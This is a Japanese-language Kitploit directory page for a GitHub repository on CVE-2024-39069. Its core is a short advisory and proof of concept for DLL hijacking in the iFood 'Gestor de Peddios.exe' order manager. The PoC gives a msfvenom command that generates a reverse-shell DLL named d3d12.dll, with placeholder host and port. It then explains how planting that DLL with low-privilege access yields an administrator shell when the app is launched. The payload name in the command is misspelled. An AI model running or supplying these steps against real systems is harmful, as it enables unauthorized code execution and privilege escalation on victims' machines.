Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-39069 — CVE-2024-39069 | Kitploit
ツール/GitHubGitHub/aungsoepaing/cve-2024-39069
特権昇格ペイロード生成エクスプロイトシェルコードペネトレーションテストバイナリエクスプロイト
GitHubaungsoepaing/cve-2024-39069

CVE-2024-39069

CVE-2024-39069

リポジトリを見る
102年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

ifood Order Manager「Gestor de Peddios.exe」- DLLハイジャック

攻撃者は、アプリケーションが正当な「d3d12.dll」よりも先に検索されるディレクトリに、悪意のある「d3d12.dll」というDLLを配置します。アプリケーションが起動されると、正当なDLLではなく悪意のあるDLLが読み込まれ、攻撃者はアプリケーションのコンテキストで任意のコードを実行できるようになります。

ベンダーホームページ: https://gestordepedidos.ifood.com.br/

Google ドライブ: https://drive.google.com/file/d/1p5SavlbLAE2o59l8jj4j-FkE_Ne_0Y-P/view?usp=sharing

POC動画: https://youtu.be/oMIobV2M0T8

POC

  1. Kali Linux上でmsfvenomを使用して悪意のあるDLLファイルを作成する

    msfvenom -p windows/x64/shell_revese_tcp LHOST=<IP> LPORT=<PORT> -f dll -o d3d12.dll
    
  2. 作成した「d3d12.dll」をKaliからWindowsホストへ、低レベルのユーザーアクセス権で転送する

  3. 作成した「d3d12.dll」ファイルを「C:\Gestor de Peddios\d3d12.dll」へ、低レベルのユーザーアクセス権で移動する

  4. 管理者がアプリケーションを実行すると、管理者としてリバースシェルを取得できる

ツールをダウンロード